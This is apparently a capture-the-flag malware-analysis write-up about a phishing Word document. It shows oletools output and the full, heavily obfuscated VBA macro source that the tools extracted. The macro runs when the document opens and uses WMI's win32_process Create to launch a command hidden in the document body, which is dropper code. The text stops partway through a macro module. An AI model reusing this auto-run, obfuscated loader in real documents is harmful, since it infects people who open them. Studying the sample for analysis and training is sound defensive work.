search

emo

hashtag
Description

WearRansom ransomware just got loose in our company. The SOC has traced the initial access to a phishing attack, a Word document with macros. Take a look at the document and see if you can find anything else about the malware and perhaps a flag.

hashtag
Solution

└─$ unzip -l emo.zip
Archive:  emo.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
   210432  2020-11-02 11:14   emo.doc
---------                     -------
   210432                     1 file
└─$ unzip -P hackthebox ./emo.zip
Archive:  ./emo.zip
  inflating: emo.doc
└─$ oleid emo.doc
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
oleid 0.60.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

Filename: emo.doc
WARNING  For now, VBA stomping cannot be detected for files in memory
--------------------+--------------------+----------+--------------------------
Indicator           |Value               |Risk      |Description
--------------------+--------------------+----------+--------------------------
File format         |MS Word 97-2003     |info      |
                    |Document or Template|          |
--------------------+--------------------+----------+--------------------------
Container format    |OLE                 |info      |Container type
--------------------+--------------------+----------+--------------------------
Application name    |Microsoft Office    |info      |Application name declared
                    |Word                |          |in properties
--------------------+--------------------+----------+--------------------------
Properties code page|1252: ANSI Latin 1; |info      |Code page used for
                    |Western European    |          |properties
                    |(Windows)           |          |
--------------------+--------------------+----------+--------------------------
Encrypted           |False               |none      |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros          |Yes, suspicious     |HIGH      |This file contains VBA
                    |                    |          |macros. Suspicious
                    |                    |          |keywords were found. Use
                    |                    |          |olevba and mraptor for
                    |                    |          |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros          |No                  |none      |This file does not contain
                    |                    |          |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External            |0                   |none      |External relationships
Relationships       |                    |          |such as remote templates,
                    |                    |          |remote OLE objects, etc
--------------------+--------------------+----------+--------------------------
└─$ olevba emo.doc
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.2 on Python 3.11.9 - http://decalage.info/python/oletools
===============================================================================
FILE: emo.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO Dw75ayd2hpcab6.cls
in file: emo.doc - OLE stream: 'Macros/VBA/Dw75ayd2hpcab6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Document_open()
Get4ipjzmjfvp.X8twf_cydt6
End Sub
Function X4al3i4glox(Gav481k8nh28)
X4al3i4glox = Replace(Gav481k8nh28, "][(s)]w", Sxybmdt069cn)
End Function
-------------------------------------------------------------------------------
VBA MACRO Get4ipjzmjfvp.frm
in file: emo.doc - OLE stream: 'Macros/VBA/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function X8twf_cydt6()
On Error Resume Next
sss = Dw75ayd2hpcab6.StoryRanges.Item(1)
   Dim LIHXDt(7 + 7 + 1 + 7) As String
Set XaXiEc = (iskkZI)
Dim SnQXASH(7 + 7 + 1 + 8) As String
LIHXDt(tBPnJI) = (Sin(1) + 205 + 6595)
aDLglIF = GXOghGA
LIHXDt(tBPnJI + tBPnJI) = (aOTNpGFFJ + 5)
LIHXDt(tBPnJI + tBPnJI) = 7 + Oct(4) + pNmvqMOzY + CDbl(14) + (4 + LNEEDGz + molmtEGC + Cos(779))
Dim AJfXCG(5 + 6 + 1 + 5) As String
Set dVZiWDFGB = (eQyofECdH)
Dim wmHOBFDQ(5 + 8 + 1 + 6) As String
AJfXCG(LEwdAb) = (Sin(2) + 2 + 4791)
xQZPEUJc = YrnIBGI
AJfXCG(LEwdAb + LEwdAb) = (khBzHCG + 313)
AJfXCG(LEwdAb + LEwdAb) = 7 + Oct(3) + gmIUFwJG + CDbl(8911) + (271 + WwyPDJG + rPLnHwi + Cos(8))
E6qgao74pfq = "][(s" + ")]wro][(s)]w][(s)]wce][(s)]w" + "s][(s)]ws][(s)]w" + Xta0s1qhuxcif8qqi5
   Dim iITzHFPc(7 + 7 + 1 + 6) As String
Set JaxgAAHY = (oRmjC)
Dim XEXOGD(8 + 6 + 1 + 8) As String
iITzHFPc(XHFVEZI) = (Sin(8) + 5 + 8051)
NcVuqJG = WcJYJvH
iITzHFPc(XHFVEZI + XHFVEZI) = (LRdJJHBHD + 8)
iITzHFPc(XHFVEZI + XHFVEZI) = 9894 + Oct(9234) + bCPzCaJIa + CDbl(6) + (1 + fLVlPYdCB + wqYKEBEF + Cos(7119))
Dim DCTECB(6 + 6 + 1 + 4) As String
Set niqpCjFDA = (YCapJCq)
Dim nrNvREE(8 + 6 + 1 + 6) As String
DCTECB(eBMBDA) = (Sin(6) + 865 + 1)
FMpxY = WJKMHJHwg
DCTECB(eBMBDA + eBMBDA) = (QeFoJxC + 45)
DCTECB(eBMBDA + eBMBDA) = 6 + Oct(5) + DJchG + CDbl(78) + (6639 + mULNNfHA + WEkRFDo + Cos(3))
Op93rci3r56v3hsg = "][(s)]w][(s" + ")]w:][(s)]ww][(s)]win][(s)]w][(s)" + "]w3][(s)]w2][(s)]w_][(s)]w" + Jxjv2dzc048yq4alc6
   Dim rhGEXH(6 + 7 + 1 + 5) As String
Set VCutHNpQ = (sbyueQG)
Dim yVnFcAyf(6 + 7 + 1 + 7) As String
rhGEXH(ezhVYCDEH) = (Sin(2711) + 5 + 922)
fQjvIImF = KzxtIH
rhGEXH(ezhVYCDEH + ezhVYCDEH) = (lRdSO + 17)
rhGEXH(ezhVYCDEH + ezhVYCDEH) = 563 + Oct(8519) + omTHCD + CDbl(79) + (4 + EiDDm + jJguE + Cos(8))
Dim ZZtqYtHHF(8 + 6 + 1 + 8) As String
Set AXStgeFJ = (omtPzHDIH)
Dim YXFLBFI(7 + 6 + 1 + 7) As String
ZZtqYtHHF(kfSkHO) = (Sin(28) + 91 + 27)
SJUzsG = sKuFbE
ZZtqYtHHF(kfSkHO + kfSkHO) = (DDxjDP + 9440)
ZZtqYtHHF(kfSkHO + kfSkHO) = 3 + Oct(1914) + JELCJT + CDbl(58) + (1 + QLSVFfyT + MHVlDGdJR + Cos(6))
K8dgvsqr6fhbct6v = "][(s)]w][(s)]ww" + "][(s)]wi][(s)]wnm][(s)]w][(s)]" + "wgm][(s)]wt][(s)]w][(s)]w" + Jeo_8i41vkli6
   Dim YbriYJz(8 + 7 + 1 + 8) As String
Set RbinpE = (OfniM)
Dim TaahYEIJ(8 + 7 + 1 + 5) As String
YbriYJz(OxVPIIKHC) = (Sin(24) + 53 + 7569)
nrhaXCJ = LXNDCgC
YbriYJz(OxVPIIKHC + OxVPIIKHC) = (kKdXMAAFA + 55)
YbriYJz(OxVPIIKHC + OxVPIIKHC) = 17 + Oct(75) + bjZaA + CDbl(1) + (9063 + EoofKVZI + DdzEJ + Cos(65))
Dim hqYtBgCG(7 + 8 + 1 + 5) As String
Set aPFWgHDEC = (mJmdpA)
Dim XfkTuGBtD(8 + 6 + 1 + 8) As String
hqYtBgCG(ZdccFCG) = (Sin(51) + 2586 + 2)
nPdvTG = UosEDIDG
hqYtBgCG(ZdccFCG + ZdccFCG) = (GZuzCBBD + 462)
hqYtBgCG(ZdccFCG + ZdccFCG) = 7 + Oct(9) + eZANoxJEF + CDbl(462) + (1 + UfwtfF + ZqEnBDnz + Cos(7))
Jv2btd64ezie8rdyer = ChrW(wdKeyS)
   Dim IAfgHf(8 + 5 + 1 + 7) As String
Set ySEvH = (dPjSD)
Dim UCKMD(7 + 7 + 1 + 7) As String
IAfgHf(pbkxGAl) = (Sin(64) + 9310 + 36)
jnRKDfHGR = xQCmGFBcQ
IAfgHf(pbkxGAl + pbkxGAl) = (xHITFH + 9)
IAfgHf(pbkxGAl + pbkxGAl) = 9 + Oct(1) + DNCnGH + CDbl(8) + (2 + BAyRTA + vCVpAH + Cos(80))
Dim QcSsG(5 + 7 + 1 + 8) As String
Set bREjDuI = (xpDtBC)
Dim TCPatL(5 + 5 + 1 + 7) As String
QcSsG(MWhDgeFoD) = (Sin(11) + 4 + 970)
yxteyAHjD = pQBvJdCI
QcSsG(MWhDgeFoD + MWhDgeFoD) = (PrLzBhA + 140)
QcSsG(MWhDgeFoD + MWhDgeFoD) = 9 + Oct(3670) + ScqHd + CDbl(4) + (5662 + WovTAEU + WECuD + Cos(131))
Sd0hj_y8cq79n589qq = K8dgvsqr6fhbct6v + Jv2btd64ezie8rdyer + Op93rci3r56v3hsg + Get4ipjzmjfvp.Fwder3b7t4tqrecw + E6qgao74pfq
   Dim eMroy(7 + 8 + 1 + 8) As String
Set sCRHlln = (deZgZAIIJ)
Dim UrkCFaES(5 + 6 + 1 + 4) As String
eMroy(uantLBkI) = (Sin(2) + 6442 + 35)
zfnsDBBHC = HKVVHA
eMroy(uantLBkI + uantLBkI) = (iESFbQ + 40)
eMroy(uantLBkI + uantLBkI) = 68 + Oct(33) + kVLyjryf + CDbl(2) + (9 + BLtWQJ + yqlXFIPe + Cos(253))
Dim BTUuI(6 + 8 + 1 + 6) As String
Set YEYxCnAN = (ESQduGo)
Dim xocsPc(5 + 7 + 1 + 4) As String
BTUuI(mNOZEGRAY) = (Sin(5806) + 7 + 8)
EKqwAQBFb = TGBcB
BTUuI(mNOZEGRAY + mNOZEGRAY) = (rctZzI + 6)
BTUuI(mNOZEGRAY + mNOZEGRAY) = 3 + Oct(7313) + Rjuav + CDbl(5975) + (4 + ZKwHJAC + qtvGJj + Cos(734))
Amst4ijfvo1r0b5ium = I51m0kjl96lpdcfhm(Sd0hj_y8cq79n589qq)
   Dim RAQLJD(7 + 7 + 1 + 6) As String
Set XClJdM = (qlnJCHFGA)
Dim AyphQ(6 + 6 + 1 + 4) As String
RAQLJD(lhsUn) = (Sin(63) + 90 + 209)
QcoqUDJC = FTLUI
RAQLJD(lhsUn + lhsUn) = (KWBRJx + 649)
RAQLJD(lhsUn + lhsUn) = 37 + Oct(9) + kiCVHdO + CDbl(3) + (13 + JVsdIYZ + yWgfDMJ + Cos(1))
Dim cxCnFdBpH(5 + 5 + 1 + 5) As String
Set ouitJA = (BvjvBpF)
Dim irZVSAFEC(6 + 8 + 1 + 7) As String
cxCnFdBpH(WlIOJA) = (Sin(4585) + 7 + 1)
koqBS = lDEQYrNuX
cxCnFdBpH(WlIOJA + WlIOJA) = (RqPWyEUZ + 6)
cxCnFdBpH(WlIOJA + WlIOJA) = 5 + Oct(1694) + UQOJSE + CDbl(451) + (1970 + HNsVvpR + UGJiRH + Cos(677))
Set Rom9dzby5v3unv8 = CreateObject(Amst4ijfvo1r0b5ium)
   Dim xCJYS(8 + 8 + 1 + 4) As String
Set nUxoA = (ndgJxJ)
Dim dNstJJ(7 + 7 + 1 + 6) As String
xCJYS(lIIdsEnz) = (Sin(7) + 21 + 9823)
UqZyGgr = qgKhJhPy
xCJYS(lIIdsEnz + lIIdsEnz) = (KsNJFACB + 3841)
xCJYS(lIIdsEnz + lIIdsEnz) = 3315 + Oct(6099) + UbgTA + CDbl(3) + (2 + lTCbsIsF + GxXWH + Cos(3))
Dim duXHDX(5 + 8 + 1 + 5) As String
Set XAdCCJCDU = (wGHRsBA)
Dim OxZCo(8 + 5 + 1 + 6) As String
duXHDX(nTEhlAA) = (Sin(7) + 760 + 24)
ZXWDXr = vmNyd
duXHDX(nTEhlAA + nTEhlAA) = (NIoXO + 7502)
duXHDX(nTEhlAA + nTEhlAA) = 2 + Oct(7381) + IlwhBGGA + CDbl(64) + (73 + ssIEJuAZ + iumzCPBhV + Cos(9582))
Dbx3w8eu9966odzw7 = Mid(sss, 5, Len(sss))
   Dim iimCF(8 + 8 + 1 + 6) As String
Set cVbUEXH = (qQWMpPjJB)
Dim KbgyWgiy(6 + 8 + 1 + 5) As String
iimCF(ddFjcBZ) = (Sin(5) + 2 + 807)
NNUQCDF = EUOuI
iimCF(ddFjcBZ + ddFjcBZ) = (tliLDA + 73)
iimCF(ddFjcBZ + ddFjcBZ) = 9754 + Oct(684) + qzATa + CDbl(5439) + (3 + tPMKDxGQJ + lPrKBf + Cos(7))
Dim ZIPdEIE(7 + 5 + 1 + 8) As String
Set KhbFIAi = (pGIpm)
Dim QnvQJAvIt(6 + 8 + 1 + 5) As String
ZIPdEIE(dEIgCCLRg) = (Sin(5195) + 1 + 3)
LvpLmB = zhnZcwHAB
ZIPdEIE(dEIgCCLRg + dEIgCCLRg) = (FySxXAIH + 19)
ZIPdEIE(dEIgCCLRg + dEIgCCLRg) = 829 + Oct(214) + TxDmIs + CDbl(195) + (85 + TeLIDpFn + sPwas + Cos(9))
Gav481k8nh28 = Tvjy9j74xspx0wpf + Amst4ijfvo1r0b5ium + Jv2btd64ezie8rdyer + Get4ipjzmjfvp.Mvskm12if9c843w3 + Get4ipjzmjfvp.Cn8r2cg8i626ztt
   Dim CuHWH(5 + 6 + 1 + 8) As String
Set eZjuS = (hlQuF)
Dim lSHDSHO(5 + 5 + 1 + 4) As String
CuHWH(INihXISI) = (Sin(240) + 9382 + 6)
CeToYEFOJ = XhFNDAfH
CuHWH(INihXISI + INihXISI) = (diQIDMTEE + 9)
CuHWH(INihXISI + INihXISI) = 532 + Oct(1) + bSBYAD + CDbl(8) + (54 + dRJBFF + RKhWIioCG + Cos(1))
Dim rBbdCgGID(7 + 7 + 1 + 6) As String
Set CsfsEQDy = (tHWouERF)
Dim MFOOHtBHH(8 + 5 + 1 + 6) As String
rBbdCgGID(ZBEbaY) = (Sin(14) + 818 + 1)
xmcvJAB = unjRC
rBbdCgGID(ZBEbaY + ZBEbaY) = (hZKtHDYG + 2163)
rBbdCgGID(ZBEbaY + ZBEbaY) = 202 + Oct(2) + kxieI + CDbl(75) + (9 + VktznpCDE + xUImPFBRx + Cos(949))
Set Nzkctvs5ewy_ds = Iwfbtu1s0d782jz(Gav481k8nh28 + Get4ipjzmjfvp.Fwder3b7t4tqrecw)
   Dim uysVZGLE(6 + 7 + 1 + 8) As String
Set HrmgKC = (yFUaERwnM)
Dim DCXgo(6 + 7 + 1 + 7) As String
uysVZGLE(VODRro) = (Sin(5) + 5 + 7)
nADlCW = DxupENAFA
uysVZGLE(VODRro + VODRro) = (kYUTCCm + 8672)
uysVZGLE(VODRro + VODRro) = 486 + Oct(547) + wFXADzAJJ + CDbl(75) + (8 + EcWkCBWH + wjhXAJF + Cos(7))
Dim dhVACDD(6 + 7 + 1 + 6) As String
Set soSvHK = (wKOSWHJ)
Dim qUyfy(7 + 5 + 1 + 5) As String
dhVACDD(LfyOFtG) = (Sin(30) + 4 + 254)
nyhPC = QpscekG
dhVACDD(LfyOFtG + LfyOFtG) = (lzcwGnM + 17)
dhVACDD(LfyOFtG + LfyOFtG) = 9 + Oct(86) + cIngGbFIE + CDbl(38) + (1 + eznxDGC + WPWWJDJ + Cos(6))
   Dim tuGlEMNUH(6 + 8 + 1 + 8) As String
Set pFgxtjm = (PTyGIAEHE)
Dim hullICDx(8 + 6 + 1 + 5) As String
tuGlEMNUH(akUPoTFvY) = (Sin(1474) + 8 + 819)
KpZdJ = lYvceWGew
tuGlEMNUH(akUPoTFvY + akUPoTFvY) = (fBhoIR + 4)
tuGlEMNUH(akUPoTFvY + akUPoTFvY) = 56 + Oct(3031) + GTYmh + CDbl(5) + (27 + yqAQE + aIkGEC + Cos(258))
Dim KgVqvF(7 + 7 + 1 + 4) As String
Set dyYfmEW = (euDCT)
Dim ZFRdGCtu(7 + 6 + 1 + 7) As String
KgVqvF(HmjZbHGBE) = (Sin(5) + 7 + 3)
FBCpGGZJ = pMeqBMo
KgVqvF(HmjZbHGBE + HmjZbHGBE) = (bdxXMNBG + 6)
KgVqvF(HmjZbHGBE + HmjZbHGBE) = 9 + Oct(95) + QOBnPkFc + CDbl(13) + (114 + kyBDET + MlSxCzI + Cos(1))
   Dim crVtKHQWB(5 + 6 + 1 + 5) As String
Set zdGjPIC = (kUBBICmD)
Dim EBxxC(6 + 7 + 1 + 8) As String
crVtKHQWB(lUoRYN) = (Sin(587) + 435 + 8)
EwbcHIpDH = QJVOHPEF
crVtKHQWB(lUoRYN + lUoRYN) = (gfcPAE + 13)
crVtKHQWB(lUoRYN + lUoRYN) = 31 + Oct(1851) + mqutET + CDbl(164) + (73 + wotoAG + QNruXSC + Cos(6))
Dim YRgECF(8 + 7 + 1 + 7) As String
Set jrSuN = (asSvxGC)
Dim jmlTEGEHD(8 + 5 + 1 + 6) As String
YRgECF(rsLfMDHRI) = (Sin(1234) + 871 + 601)
urCBGDI = LPZGqW
YRgECF(rsLfMDHRI + rsLfMDHRI) = (WKBwIIx + 80)
YRgECF(rsLfMDHRI + rsLfMDHRI) = 8819 + Oct(158) + irqNf + CDbl(5) + (9 + SsmqieBVT + kFfqC + Cos(526))
Rom9dzby5v3unv8. _
Create AWLDFu7C7y(I51m0kjl96lpdcfhm(Dbx3w8eu9966odzw7)), Kw8r40ymn9ne3xu, Nzkctvs5ewy_ds
   Dim CpULFB(5 + 5 + 1 + 7) As String
Set axAfIEGRA = (QROQHnVJ)
Dim QHdoB(8 + 5 + 1 + 5) As String
CpULFB(TrBpFI) = (Sin(8) + 657 + 23)
xSnpcJCH = gtlfI
CpULFB(TrBpFI + TrBpFI) = (lsdYGbJFn + 638)
CpULFB(TrBpFI + TrBpFI) = 9806 + Oct(724) + uHfXN + CDbl(932) + (7 + sbFHIIArH + sxbtG + Cos(28))
Dim usrCDU(8 + 8 + 1 + 4) As String
Set sHuwpJH = (gWJfc)
Dim YxEfjGJ(5 + 8 + 1 + 4) As String
usrCDU(WMDxGNE) = (Sin(7) + 742 + 600)
DvEdpD = tvUMTQF
usrCDU(WMDxGNE + WMDxGNE) = (ybnwoB + 4617)
usrCDU(WMDxGNE + WMDxGNE) = 789 + Oct(98) + RkTnG + CDbl(3) + (4 + GyKLzEF + NLKIdFC + Cos(3))
   Dim fvJsBBDU(5 + 6 + 1 + 5) As String
Set dmUGJtEIO = (uydmCpg)
Dim FclRuzDG(5 + 8 + 1 + 6) As String
fvJsBBDU(HymnRVRE) = (Sin(6) + 37 + 3598)
YkQZHhJH = WpwcG
fvJsBBDU(HymnRVRE + HymnRVRE) = (qljYKHo + 385)
fvJsBBDU(HymnRVRE + HymnRVRE) = 3 + Oct(3) + xrYfDFtK + CDbl(5) + (89 + hIjOfJ + RPNhCwDC + Cos(6))
Dim qQldIhoCE(8 + 8 + 1 + 5) As String
Set rHlNGA = (xOzmLO)
Dim pNdhI(5 + 6 + 1 + 6) As String
qQldIhoCE(loWUokjFC) = (Sin(9987) + 2 + 220)
RvbYFFAfH = IUzlJJ
qQldIhoCE(loWUokjFC + loWUokjFC) = (etSoIE + 1)
qQldIhoCE(loWUokjFC + loWUokjFC) = 57 + Oct(3) + PrkTCejb + CDbl(207) + (8 + MRAMjOPB + uGpbAu + Cos(9740))
End Function
Function Iwfbtu1s0d782jz(Wvnulte_7rd74l873)
On Error Resume Next
   Dim ouUhFGIGf(5 + 7 + 1 + 5) As String
Set RlxSfHAYF = (JDFYIEIER)
Dim NAFGBBt(7 + 6 + 1 + 5) As String
ouUhFGIGf(VvufD) = (Sin(1912) + 9 + 32)
aLEvBtsA = yiBOhGPHC
ouUhFGIGf(VvufD + VvufD) = (SpCZJgIbx + 1)
ouUhFGIGf(VvufD + VvufD) = 47 + Oct(2) + JKDmHJ + CDbl(5) + (3 + ycwsIG + xFozEoBTm + Cos(4))
Dim vfVAC(7 + 7 + 1 + 7) As String
Set kWFWBISu = (FtcKEFcG)
Dim zPozC(7 + 7 + 1 + 8) As String
vfVAC(XSBMFAXy) = (Sin(5) + 7 + 804)
faeGBD = QiOaCJf
vfVAC(XSBMFAXy + XSBMFAXy) = (uOKtFrCB + 60)
vfVAC(XSBMFAXy + XSBMFAXy) = 1 + Oct(505) + kOXeC + CDbl(8) + (9 + ZxfmTDAmT + DMLyG + Cos(9))
Set Iwfbtu1s0d782jz = Rk3572j7tam4v8.Y5ruq1pwxek1348fi(I51m0kjl96lpdcfhm(A1h3yevqvs8 + Wvnulte_7rd74l873 + Hkhlqz9x9h9xvlv))
   Dim eMynDvEG(7 + 8 + 1 + 4) As String
Set bosZTe = (ZHQRDVvED)
Dim SCxUDgXHF(7 + 7 + 1 + 6) As String
eMynDvEG(qsaqdCD) = (Sin(481) + 2486 + 61)
KNHer = DzVJD
eMynDvEG(qsaqdCD + qsaqdCD) = (QVKICAHGC + 1)
eMynDvEG(qsaqdCD + qsaqdCD) = 63 + Oct(843) + rhVSHHA + CDbl(1) + (1840 + FDakJyDA + ZdugFEBSS + Cos(6))
Dim hblBI(8 + 6 + 1 + 4) As String
Set cRTStDFB = (jzfrAO)
Dim lDyKI(7 + 5 + 1 + 6) As String
hblBI(xRdCB) = (Sin(10) + 9219 + 9)
rNbDIAUS = tmRgDDGE
hblBI(xRdCB + xRdCB) = (oVNifh + 9)
hblBI(xRdCB + xRdCB) = 9 + Oct(79) + lClHEe + CDbl(115) + (688 + VbMPGQ + rqzDD + Cos(1))
Iwfbtu1s0d782jz.XSize = 0
Iwfbtu1s0d782jz.YSize = 0
   Dim fRjdFCIm(6 + 5 + 1 + 8) As String
Set yMhIFMGD = (kkoDI)
Dim mRxAL(8 + 6 + 1 + 4) As String
fRjdFCIm(XhxlCSmJE) = (Sin(46) + 8 + 484)
ocTFGCAM = ZNLRD
fRjdFCIm(XhxlCSmJE + XhxlCSmJE) = (xpdUDHB + 8)
fRjdFCIm(XhxlCSmJE + XhxlCSmJE) = 1 + Oct(36) + phOaIiI + CDbl(6) + (5 + fimLiVBCE + irpLx + Cos(4))
Dim POgWDiUG(6 + 7 + 1 + 8) As String
Set aZZkJIA = (zxAAItq)
Dim PoLDI(5 + 8 + 1 + 6) As String
POgWDiUG(qBxkBh) = (Sin(7745) + 80 + 289)
ZZaOlHYa = UsWoBEn
POgWDiUG(qBxkBh + qBxkBh) = (OlOXGbk + 1)
POgWDiUG(qBxkBh + qBxkBh) = 8870 + Oct(5) + lnibY + CDbl(46) + (570 + fOpUYSC + VZimy + Cos(329))
End Function
Function I51m0kjl96lpdcfhm(St7625txnot)
On Error Resume Next
   Dim nIMomJ(7 + 5 + 1 + 8) As String
Set mwiaJCwY = (LvplXHH)
Dim bCxOZBGJR(6 + 6 + 1 + 8) As String
nIMomJ(lQahnH) = (Sin(2) + 29 + 904)
XwJoHQ = swDDEHEDy
nIMomJ(lQahnH + lQahnH) = (GQkQDQf + 9)
nIMomJ(lQahnH + lQahnH) = 20 + Oct(3) + tATQD + CDbl(66) + (82 + DHKVEjKIS + UBGVGJDD + Cos(8048))
Dim FkCoHp(8 + 7 + 1 + 4) As String
Set fNdLD = (lXCHyAEv)
Dim ZNsIEB(5 + 5 + 1 + 6) As String
FkCoHp(LSiwbWHo) = (Sin(493) + 778 + 25)
SqrRClQBm = jZAcJp
FkCoHp(LSiwbWHo + LSiwbWHo) = (ScUjHHSkX + 6)
FkCoHp(LSiwbWHo + LSiwbWHo) = 66 + Oct(6) + ZWRjGgE + CDbl(280) + (8 + kbqbLIIH + RxjoHFC + Cos(9))
Swa7jh9qx56op58nf = (St7625txnot)
   Dim UmkRIEu(5 + 6 + 1 + 8) As String
Set jYQSjI = (JVnNDbnpC)
Dim ZWgajTo(7 + 7 + 1 + 7) As String
UmkRIEu(okgKdGCG) = (Sin(822) + 3 + 3)
wzVsH = bPaVhJDH
UmkRIEu(okgKdGCG + okgKdGCG) = (LCaMAWCHk + 934)
UmkRIEu(okgKdGCG + okgKdGCG) = 9047 + Oct(2543) + XuuEfCwWA + CDbl(7) + (9 + TFDpDAx + TpHsk + Cos(2))
Dim qwjsHJcH(7 + 5 + 1 + 7) As String
Set bjNVAA = (ymTUHIABF)
Dim XrdSyMG(8 + 5 + 1 + 8) As String
qwjsHJcH(sxcyGH) = (Sin(697) + 928 + 7)
VRTbBsA = TpZMxj
qwjsHJcH(sxcyGH + sxcyGH) = (BUIACDGtC + 9)
qwjsHJcH(sxcyGH + sxcyGH) = 3 + Oct(3493) + iFRnr + CDbl(3) + (8 + ShbgyJGE + luZZRJ + Cos(78))
Sxhaen2_r4b3crptm = Dw75ayd2hpcab6.X4al3i4glox(Swa7jh9qx56op58nf)
   Dim kdscDErj(7 + 6 + 1 + 4) As String
Set aFfpGp = (hjRTZNDGJ)
Dim zqVkuHu(6 + 7 + 1 + 6) As String
kdscDErj(BElQC) = (Sin(5) + 6 + 354)
SZbrtCp = qZHeJAD
kdscDErj(BElQC + BElQC) = (inMTLGJ + 5)
kdscDErj(BElQC + BElQC) = 86 + Oct(93) + RtKSEXETs + CDbl(237) + (2 + dwBsFG + MOwHB + Cos(2))
Dim rHyLrgvAP(6 + 8 + 1 + 6) As String
Set lscaa = (qlYFWCFA)
Dim gbwak(6 + 8 + 1 + 5) As String
rHyLrgvAP(QpIaAorpF) = (Sin(512) + 8702 + 83)
FmoXED = RQQNg
rHyLrgvAP(QpIaAorpF + QpIaAorpF) = (TTSBDUcC + 3)
rHyLrgvAP(QpIaAorpF + QpIaAorpF) = 5 + Oct(4) + iThYS + CDbl(3) + (5510 + TtcmHO + KPifuU + Cos(846))
I51m0kjl96lpdcfhm = Sxhaen2_r4b3crptm
   Dim blXJIk(6 + 5 + 1 + 8) As String
Set rqhtP = (lOtlxlA)
Dim aQkjA(6 + 8 + 1 + 4) As String
blXJIk(KWpQoCS) = (Sin(8) + 3 + 250)
fLSrFg = VAfNIJ
blXJIk(KWpQoCS + KWpQoCS) = (YkcHHEu + 8)
blXJIk(KWpQoCS + KWpQoCS) = 3 + Oct(6) + sDzaU + CDbl(6) + (1491 + zzzqCZHH + RERUEDBAD + Cos(3))
Dim qpTXy(5 + 5 + 1 + 8) As String
Set mOTdDDIJ = (vWqBlKEj)
Dim kvQxfB(5 + 8 + 1 + 6) As String
qpTXy(krBPlqzJ) = (Sin(84) + 186 + 6)
RCDZe = FyehtVb
qpTXy(krBPlqzJ + krBPlqzJ) = (WiRYhFfQ + 2144)
qpTXy(krBPlqzJ + krBPlqzJ) = 13 + Oct(1) + oyRjRH + CDbl(8) + (7 + WzEZBS + caPLFkOJl + Cos(5822))
End Function
Function T34b0j5rffcr(Ny676u98ho9ja)
Xlcdcd2bzdz8f4 = Pgmtj98xbz1mkec2y
End Function
Function AWLDFu7C7y(AMUjF5h4uz)
On Error Resume Next
Dim qpTXy(5 + 5 + 1 + 8) As String
Dim kvQxfB(5 + 8 + 1 + 6) As String
qpTXy(krBPlqzJ) = (Sin(84) + 186 + 6)
RCDZe = FyehtVb
qpTXy(krBPlqzJ + krBPlqzJ) = (WiRYhFfQ + 2144)
qpTXy(krBPlqzJ + krBPlqzJ) = 13 + Oct(1) + oyRjRH + CDbl(8) + (7 + WzEZBS + caPLFkOJl + Cos(5822))
AWLDFu7C7y = Mid(AMUjF5h4uz, 1, 50)
Dim UmkRIEu(5 + 6 + 1 + 8) As String
Set jYQSjI = (JVnNDbnpC)
Dim ZWgajTo(7 + 7 + 1 + 7) As String
UmkRIEu(okgKdGCG) = (Sin(822) + 3 + 3)
wzVsH = bPaVhJDH
UmkRIEu(okgKdGCG + okgKdGCG) = (LCaMAWCHk + 934)
UmkRIEu(okgKdGCG + okgKdGCG) = 9047 + Oct(2543) + XuuEfCwWA + CDbl(7) + (9 + TFDpDAx + TpHsk + Cos(2))
For i = 51 To Len(AMUjF5h4uz) Step 2
Dim dhVACDD(6 + 7 + 1 + 6) As String
Set soSvHK = (wKOSWHJ)
AWLDFu7C7y = AWLDFu7C7y & Mid(AMUjF5h4uz, i, 1)
Dim qUyfy(7 + 5 + 1 + 5) As String
dhVACDD(LfyOFtG) = (Sin(30) + 4 + 254)
nyhPC = QpscekG
dhVACDD(LfyOFtG + LfyOFtG) = (lzcwGnM + 17)
dhVACDD(LfyOFtG + LfyOFtG) = 9 + Oct(86) + cIngGbFIE + CDbl(38) + (1 + eznxDGC + WPWWJDJ + Cos(6))
Next i
Dim IAfgHf(8 + 5 + 1 + 7) As String
Set ySEvH = (dPjSD)
Dim UCKMD(7 + 7 + 1 + 7) As String
IAfgHf(pbkxGAl) = (Sin(64) + 9310 + 36)
jnRKDfHGR = xQCmGFBcQ
IAfgHf(pbkxGAl + pbkxGAl) = (xHITFH + 9)
IAfgHf(pbkxGAl + pbkxGAl) = 9 + Oct(1) + DNCnGH + CDbl(8) + (2 + BAyRTA + vCVpAH + Cos(80))
Dim QcSsG(5 + 7 + 1 + 8) As String
Set bREjDuI = (xpDtBC)
Dim TCPatL(5 + 5 + 1 + 7) As String
QcSsG(MWhDgeFoD) = (Sin(11) + 4 + 970)
yxteyAHjD = pQBvJdCI
QcSsG(MWhDgeFoD + MWhDgeFoD) = (PrLzBhA + 140)
QcSsG(MWhDgeFoD + MWhDgeFoD) = 9 + Oct(3670) + ScqHd + CDbl(4) + (5662 + WovTAEU + WECuD + Cos(131))
End Function
-------------------------------------------------------------------------------
VBA MACRO Rk3572j7tam4v8.bas
in file: emo.doc - OLE stream: 'Macros/VBA/Rk3572j7tam4v8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function Y5ruq1pwxek1348fi(Hy5393z_cu1)
On Error Resume Next
   Dim TAKBR(6 + 7 + 1 + 5) As String
Set ivvpvBW = (yWAMfE)
Dim rkcHF(5 + 6 + 1 + 6) As String
TAKBR(ksEsBaCtA) = (Sin(1897) + 5881 + 6)
ZOmZFY = UovwGH
TAKBR(ksEsBaCtA + ksEsBaCtA) = (jHUdBB + 44)
TAKBR(ksEsBaCtA + ksEsBaCtA) = 6 + Oct(116) + YSVfIA + CDbl(6) + (6 + MakkGA + qhhoEEA + Cos(5))
Dim ojnIHCE(7 + 5 + 1 + 7) As String
Set UuAPGAfFH = (jdxSsGH)
Dim BctfKqn(6 + 8 + 1 + 5) As String
